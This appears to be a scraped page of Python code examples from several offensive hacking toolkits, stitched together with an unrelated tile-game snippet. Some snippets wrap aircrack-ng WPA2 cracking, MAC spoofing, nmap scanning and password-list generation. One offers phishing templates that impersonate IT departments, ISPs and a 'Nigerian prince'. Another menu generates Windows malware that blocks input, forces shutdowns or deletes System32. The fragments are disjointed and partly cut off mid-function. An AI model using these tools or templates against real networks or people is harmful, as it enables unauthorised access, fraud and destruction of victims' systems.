Exemple #1
0
def startup():
    core.clear()
    # print("[" + green + "+" + rr + "]  Starting Mal-editor... ") (we dont need this , to much text on screen )
    print("[" + green + "OK" + rr + "] Mal-editor Successfully Started!")
    core.maleditorlogo()
    options()

    whole_file = []
    CurrentFileName = "Untitled"
    if operating_system == "Linux":
        raw_cmd = read_from_file(os.path.join(sys.path[0], "allcmds.txt"))
    else:
        raw_cmd = read_from_file("~/mal-factory/allcmds.txt")

    try:
        while True:
            command = input(red + "Mal" + green + "Editor" + rr + " > ")
            if command == "99" or command.lower() == "exit" or command.lower(
            ) == "quit" or command.lower() == "e":
                raise KeyboardInterrupt

            elif command.split(" ")[0] == "r":
                try:
                    whole_file.pop(int(command.split(" ")[1]))
                except:
                    print("[!] Error trying to remove a line")
                set_screen(whole_file, CurrentFileName)

            elif command == "s":
                try:
                    filename = input(blue + "[*] Save as" + rr + ": ")
                    CurrentFileName = filename
                    savefile = open("~/{}.txt".format(filename), "w")
                    for element in whole_file:
                        savefile.write(element + "\n")
                    savefile.close()
                except Exception:
                    print(red + "[!] Error saving file as " + filename + rr)

                print(green + "[ OK ] File saved in ~/{}".format(filename) +
                      rr)

            elif check_command(command, raw_cmd):
                whole_file.append(command)
                set_screen(whole_file, CurrentFileName)
            else:
                set_screen(whole_file, CurrentFileName)
                print(rr + "\n[" + red + "-" + rr + "] Not a valid command: " +
                      command)

            core.clear()
            options()
            show_file(whole_file, CurrentFileName)

    except KeyboardInterrupt:
        main.startup()
    except Exception:
        print(red + core.bold + "[!] Error in MalEditor")
        raise
Exemple #2
0
def main():
    load_map()
    drop_gold()
    update()
    while True:
        pressedkey = getch().lower()
        if pressedkey == 'q':
            clear()
            sys.exit(0)
        elif pressedkey == 'w':
            go(MOVE['UP'])
        elif pressedkey == 'a':
            go(MOVE['LEFT'])
        elif pressedkey == 's':
            go(MOVE['DOWN'])
        elif pressedkey == 'd':
            go(MOVE['RIGHT'])
Exemple #3
0
def start():
    try:
        core.clear()
        print("--------------------- \n")
        os.system("ifconfig")
        print("\n--------------------- \n")
        os.system("lanscan interfaces")
        print("\n--------------------- \n")
        answer = input(
            "Please type your wireless adapter's name (Default: wlan0): ")
        if answer == "":
            mon = "wlan0"
        else:
            mon = answer
        startup(mon)
    except KeyboardInterrupt:
        core.quit()
Exemple #4
0
def menu():
    core.clear()
    time.sleep(0.2)
    print(core.green + "Initializing...")
    time.sleep(0.2)
    print(core.green + "SkyBREAK ver. 1.5.89")
    print(core.green + "Interf. type " + adapter + "/" + monadapter)
    time.sleep(0.2)
    print(
        core.green +
        """\n    Welcome to skyBREAK. You have the following crackers installed:
        > WEP
        > WPA
        > WPA2""")
    try:
        ALLanswer()
    except KeyboardInterrupt:
        core.clear()
        exit()
Exemple #5
0
def clear():
    core.clear()
Exemple #6
0
def set_screen(file_to_show):
    core.clear()
    options()
    show_file(file_to_show)
Exemple #7
0
def inbox(username, password):
    try:
        print(line)
        core.gmaillogo()
        print(line + "\n")
        while True:
            answer = input(gmail + core.yellow + " > " + core.rr + "")
            answer = answer.lower()
            answer = answer.split(" ")
            if answer[0] == "help":
                print("\n-----------\n")
                print(core.ul + "The Help/Command Menu" + core.rr)
                print("\nhelp - Opens this help menu")
                print("reload - Reloads the screen")
                print("template - See the gmail templates")
                print(
                    "send <*****@*****.**> - Send an email with your gmail account"
                )
                print(
                    "send <*****@*****.**> -t <template> - Send an email with a pre-set template with your gmail account"
                )
                print("exit - Go back to the homepage")
                print("\n-----------\n")
            elif answer[0] == "template" or answer[0] == "templates":
                print("""\n-----------\n
(DO NOT USE THIS FOR ILLEGAL PURPOUSES
\n-----------\n
NP - (Nigerian Prince) - Send an email asking people to help a helpless rich nigerian prince
* REQUIRES FIRSTNAME AND LASTNAME
-----------
ITD - (IT Department) - Send an email pretending to be a company's I.T department
* REQUIRES LASTNAME, COMPANYNAME
-----------
UA - (Unauthorized Access) - Send an email claiming someone's account has reached unauthorized access
* REQUIRES FIRSTNAME, LASTNAME, COMPANYNAME, AND USERNAME
-----------
RSU - (Router Software Update) - Send an email from a router company asking to download a software update
* REQUIRES FIRSTNAME, LASTNAME, COMPANYNAME, ROUTERNAME
-----------
ISU - (ISP Software Update) - Send an email from an Internet Service Provider company asking to download a software update
* REQUIRES FIRSTNAME, LASTNAME, COMPANYNAME, AND ADDRESS
\n-----------\n
LME - (Legitimate Malfactory Email) - Send an email expressing that the email contains malware from Malfactory
-----------
LMAE - (Legitimate Malware Analysis Email) - Send an email expressing that the email contains malware for analysis
\n-----------\n""")
            elif answer[0] == "exit":
                main.startup()
            elif answer[0] == "reload" or answer[0] == "clear":
                core.clear()
                print(line)
                core.gmaillogo()
                print(line + "\n")
            elif answer[0] == "send":
                try:
                    TO = answer[1]
                    SUBJECT = input("\nSubject: ")
                    print("\n--- Type 'quit' to Finish! ---")
                    TEXT = ""
                    x = 1
                    while True:
                        message = input(str(x) + ": ")
                        if message.lower() == "quit" or message.lower() == "q":
                            print("\n")
                            break
                        TEXT = TEXT + message + "\n"
                        x += 1
                    BODY = '\r\n'.join([
                        'To: %s' % TO,
                        'From: %s' % username,
                        'Subject: %s' % SUBJECT, '', TEXT
                    ])
                    try:
                        server.sendmail(username, [TO], BODY)
                        print('Your email was sent!')
                    except:
                        print(
                            "Error sending mail! Does the recipient's email exist?"
                        )
                except:
                    print(
                        "\nError: Could not send email! Your command was incorrectly set.\n"
                    )
            elif answer[0] == "send" and answer[3] == "-t":
                try:
                    TO = answer[1]
                    TEMPLATE = answer[3]
                    SUBJECT = input("\nSubject: ")
                    TEXT = TEMPLATE
                    print(TEMPLATE)
                    try:
                        server.sendmail(username, [TO], BODY)
                        print('Your email was sent!')
                    except:
                        print(
                            "Error sending mail! Does the recipient's email exist?"
                        )
                except:
                    print(
                        "\nError: Could not send email! Your command was incorrectly set.\n"
                    )
            else:
                print("\nCommand '" + str(answer) +
                      "' was not found. Please type 'help' for help.\n")
    except KeyboardInterrupt:
        main.startup()
    except:
        print("\nError: Can't find input.\n")
        raise
Exemple #8
0
                    print(core.green + "Please do 'capture <BSSID> <CH>'.")
            elif answer[0] == "crack":
                try:
                    BSSID = answer[1]
                    PASSWORDLIST = answer[2]
                    LOCATION = answer[3]
                    os.system("aircrack-ng -a2 -b " + BSSID + " -w " +
                              PASSWORDLIST + " " + LOCATION)
                except:
                    print(
                        core.green +
                        "Please do 'crack <BSSID> <PASSWORDLIST> <LOCATION>'.")
            elif answer[0] == "exit":
                ALLanswer()
            else:
                print(
                    fullanswer +
                    " is not a recognized command. Type HELP for more information."
                )
    except KeyboardInterrupt:
        print(core.green + "")
        ALLanswer()


core.clear()
adapter = input("Please type your WiFi Adapter/Network Interface: ")
monadapter = input(
    "Please type your WiFi Adapter/Network Interface In Monitor Mode: ")
os.system("sudo airmon-ng start " + adapter)
menu()
Exemple #9
0
def update():
    clear()
    print_map_with_items()
    score()
    debug()
Exemple #10
0
def __main__():
    core.clear()
    print(Style.BRIGHT + """ 

    \   \ ) __(  (  _( )__ __(/  _ \ / __ \ ) () ( ) __( /  _ \ 
    | ) ( | _)   _) \    | |  )  ' / ))__(( '.  /  | _)  )  ' / 
    /___/ )___( )____)   )_(  |_()_\ \____/  /_(   )___( |_()_\ 

    | TheDestroyer is a Framework that Generates Malware that'll 
    | ruin/Destroy a Windows Machine. This is made for Teaching/Educational
    | Purposes only. I am not responsible for any kind of misuse or Damage 
    | caused by the Program. 

    --> Linux Version - V.1                                
    """ + Style.RESET_ALL)
    print("[[ USER :: " + core.username() + " ]]")

    main = input(core.hostname()+"$> ")
    main = main.lower().strip()

    if(main == "help"):
        print(""" 
        Commands : 
        ~ help - Print this Help message
        ~ list - List available Destroyers
        ~ setup - Install  Required Packages
        ~ compile - Create a Destroyer
        ~ exit - Exit
        """)
        input(core.star_blue + " Press Enter.")
        __main__()
    elif(main == "list"):
        print("- Ded.exe (Ded.exe) - Command Line Spammer - " + core.check_status("Ded.exe"))
        print("- Pauser.exe (Pauser.exe) - Input Blocker - " + core.check_status("Pauser.exe"))
        print("- Persistent Shutdown (ps.exe) - " + core.check_status("ps.exe"))
        print("- delSystem32 - Obvious (sys32.exe) - " + core.check_status("sys32.exe"))
        print("- More coming soon.")
        input(core.star_blue + " Press Enter.")
        __main__()
    elif(main == "compile"):
        core.clear()
        print(""" 
        [1] Ded.exe - Command Line Spammer
        [2] Pauser - Input Blocker
        [3] Persistent Shutdown - Obvious
        [4] delSystem32 - Obvious
        [-] More coming soon..
        """)
        print(core.star_blue, "Enter Numeric Value below.")
        type = input(core.star_bold + " Select Destroyer to Generate : ")
        if(type == "1"):
            core.ded()
            input(core.star_blue + " Press Enter.")
            __main__()

        elif(type == "2"):
            core.pauser()
            input(core.star_blue + " Press Enter.")
            __main__()

        elif(type == "3"):
            core.ps()
            input(core.star_blue + " Press Enter.")
            __main__()
        
        elif(type == "4"):
            core.sys32()
            input(core.star_blue + " Press Enter.")
            __main__()

        else:
            input(core.star_blue + " Unidentified.")
            __main__()
        
    elif(main == "setup"):
        print(core.star_blue, "Will install Required Packages.")
        os.system("sudo apt-get install mingw-w64")
        print(core.star_cyan, "Done.")
        input(core.star_blue + " Press Enter.")
        __main__()
    elif(main == "exit"):
        exit(1)
    else:
        input(core.star_blue + " Type help.")
        __main__()
Exemple #11
0
def startup(mon):
    core.clear()
    core.logo()
    print(r + ul + bo + "Welcome to Airline-Crack!" + r + "\n")
    print("Your device: " + core.checksystem())
    print("Your network interface: " + mon)
    print("Your original mac address: " + str(mac_id))
    os.system("macchanger -s " + mon)
    print("")
    print(bo + "Scanning:" + r)
    print(r + "(" + lc + "1" + r + ")" + "  Scan for access points. (Airport)")
    print(r + "(" + lc + "2" + r + ")" +
          "  Scan IPs and MAC-Addresses/Devices on network (Arp-Scan)")
    print(r + "(" + lc + "3" + r + ")" +
          "  Scan for packets on a network (Airport + TCPdump)")
    print(r + "(" + lc + "4" + r + ")" + "  Scan an IP Address (Nmap)")
    print(r + "(" + lc + "5" + r + ")" + "  Scan an IP Address (Ipcalc)")
    print(bo + "MAC Address:" + r)
    print(r + "(" + lc + "6" + r + ")" +
          "  Become a specific MAC address (Macchanger)")
    print(r + "(" + lc + "7" + r + ")" +
          "  Become a random MAC address (Macchanger)")
    print(bo + "Password Cracking:" + r)
    print(r + "(" + lc + "8" + r + ")" + "  Make a password list (Crunch)")
    print(r + "(" + lc + "9" + r + ")" +
          "  Crack WEP WiFi passwords (Airport + Aircrack)")
    print(bo + "Extra:" + r)
    print(r + "(" + lc + "r" + r + ")" + "  Reload/Clear the screen")
    print(r + "(" + lc + "99" + r + ")" + " Exit the tool (CNTRL + C) \n")

    while True:
        answer = input(bo + "Airline" + r + "-" + re + "C" + y + "r" + g +
                       "a" + lc + "c" + p + "k" + lc + " > " + r)

        if answer == "1":
            wifiscan(mon)

        if answer == "2":
            print("")
            os.system("sudo arp-scan -l")
            print("")
            save = input(
                "Would you like to save these outputs? (Default = No): ")
            if save == "y" or save == "yes" or save == "Y" or save == "Yes" or save == "YES":
                savename = input(
                    "What would you like to call the file? (Default: arp-scan): "
                )
                if savename == "":
                    savename = "arp-scan"
                os.system("sudo arp-scan -l > " + savename + ".log")
                print("")
                input("Your output was saved in " + savename + ".log")
                startup(mon)
            else:
                input("\nAlright, your output was not saved.")
                startup(mon)

        elif answer == "3":
            tcpscan(mon)

        elif answer == "4":
            print("")
            IP = input("Please type a specific IP Address: ")
            print("")
            os.system("sudo nmap -A " + IP)
            print("")
            save = input(
                "Would you like to save these outputs? (Default = No): ")
            if save == "y" or save == "yes" or save == "Y" or save == "Yes" or save == "YES":
                savename = input(
                    "What would you like to call the file? (default: nmap-xxx.xxx.x.x): "
                )
                if savename == "":
                    savename = "nmap-" + IP
                os.system("sudo nmap -A " + IP + " > " + savename + ".log")
                print("")
                input("Your output was saved in " + savename + ".log")
                startup(mon)
            else:
                input("\nAlright, your output was not saved.")
                startup(mon)

        elif answer == "5":
            print("")
            IP = input("Please type a specific IP Address: ")
            print("")
            os.system("ipcalc " + IP)
            print("")
            save = input(
                "Would you like to save these outputs? (Default = No): ")
            if save == "y" or save == "yes" or save == "Y" or save == "Yes" or save == "YES":
                savename = input(
                    "What would you like to call the file? (default: ipcalc-xxx.xxx.x.x): "
                )
                if savename == "":
                    savename = "ipcalc-" + IP
                os.system("sudo nmap -A " + IP + " > " + savename + ".log")
                print("")
                input("Your output was saved in " + savename + ".log")
                startup(mon)
            else:
                input("\nAlright, your output was not saved.")
                startup(mon)

        elif answer == "6":
            print("")
            macspoof = input("Please type a specific Mac Address: ")
            print("")
            os.system("macchanger -m " + macspoof + " " + mon)
            print("")
            input("Finished! Please press {ENTER} to continue...")
            startup(mon)

        elif answer == "7":
            print("")
            macspoof = os.system("macchanger -r " + mon)
            print("")

        elif answer == "8":
            print("")
            print("---------------------")
            crunchname = input(
                "Please type the name of the password text file (Default: rockyou): "
            )
            if crunchname == "" or crunchname == " ":
                crunchname = "rockyou"
            crunchname = crunchname.replace(" ", "_")
            print("---------------------")
            print("Ex: ~/Desktop")
            crunchdir = input(
                "Type the directory you want the file to be in: ")
            print("---------------------")
            crunchmin = input("Minimum # of characters for passwords: ")
            print("---------------------")
            crunchmax = input("Maximum # of characters for passwords: ")
            print("---------------------")
            print("@ = Any character/number (Wildcard)")
            print("123... = Any number")
            print(
                "Ex: 123456789abcd = characters that can be the # 1-9 or a-d in the alphabet."
            )
            crunchset = input("Enter the setup for passwords: ")
            print("")
            os.system("crunch " + crunchmin + " " + crunchmax + " " +
                      crunchset + " -o " + crunchdir + "/" + crunchname +
                      ".txt")
            print("")
            input("Finished! Your password file, " + crunchname +
                  ".txt is at " + crunchdir)
            startup(mon)

        elif answer == "9":
            wepCrack(mon)

        elif answer == "r":
            startup(mon)

        elif answer == "99":
            core.quit()

        elif answer == "exit":
            core.quit()

        else:
            print("\nThe choice '" + answer +
                  "' was not found. Please pick a choice above. \n")